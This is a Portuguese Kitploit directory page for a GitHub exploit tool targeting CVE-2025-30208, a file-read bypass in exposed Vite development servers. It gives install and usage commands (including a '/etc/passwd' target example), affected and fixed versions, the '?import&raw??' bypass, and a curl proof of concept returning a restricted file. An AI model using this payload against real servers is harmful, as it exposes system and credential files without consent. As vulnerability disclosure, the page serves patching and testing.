Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-30208 — Este exploit destina-se apenas a fins educacionais e de testes de segurança éticos. O uso deste exploit contra alvos sem consentimento mútuo prévio é ilegal, e o desenvolvedor isenta-se de qualquer responsabilidade por uso indevido ou danos causados por este exploit. | Kitploit
Ferramentas/GitHubGitHub/on1onss/cve-2025-30208
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubon1onss/cve-2025-30208

CVE-2025-30208

Este exploit destina-se apenas a fins educacionais e de testes de segurança éticos. O uso deste exploit contra alvos sem consentimento mútuo prévio é ilegal, e o desenvolvedor isenta-se de qualquer responsabilidade por uso indevido ou danos causados por este exploit.

Ver Repositório
4há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-30208

[!IMPORTANT]

Aviso Legal

Este exploit é apenas para fins educacionais e de testes de segurança ética. O uso deste exploit contra alvos sem consentimento mútuo prévio é ilegal, e o desenvolvedor se isenta de qualquer responsabilidade por uso indevido ou danos causados por este exploit.

Instalação

root@kitploit:~
git clone https://github.com/On1onss/CVE-2025-30208.git
cd CVE-2025-30208
pip install -r requirements.txt

Uso

root@kitploit:~
python CVE-2025-30208.py [-h] [-t <Target URL>] [-fp <File Path>] [-i]

options:
  -h, --help       show this help message and exit
  -t <Target URL>  Example: -t http://localhost:5173/
  -fp <File Path>  Example: -fp /etc/passwd
  -i               Interactive mode

Descrição

Versões afetadas

root@kitploit:~
>= 6.2.0, < 6.2.3
>= 6.1.0, < 6.1.2
>= 6.0.0, < 6.0.12
>= 5.0.0, < 5.4.15
< 4.5.10

Versões corrigidas

root@kitploit:~
6.2.3
6.1.2
6.0.12
5.4.15
4.5.10

Resumo

O conteúdo de arquivos arbitrários pode ser retornado ao navegador.

Impacto

Somente aplicativos que expõem explicitamente o servidor de desenvolvimento do Vite à rede (usando a opção de configuração --host ou server.host) são afetados.

Detalhes

O @fs nega o acesso a arquivos fora da lista de permissões do Vite. Adicionar ?raw?? ou ?import&raw?? à URL contorna essa limitação e retorna o conteúdo do arquivo, se ele existir. Essa falha de bypass existe porque separadores finais, como ?, são removidos em vários lugares, mas não são considerados nas regexes de query string.

PoC

root@kitploit:~
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
# sourceMappingURL=data:application/json;base64,eyJ2...

Referências

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30208
  • https://github.com/advisories/GHSA-x574-m823-4x7w
  • vitejs/vite@315695e
  • vitejs/vite@80381c3
  • vitejs/vite@807d7f0
  • vitejs/vite@92ca12d
  • vitejs/vite@f234b57
Baixar ferramenta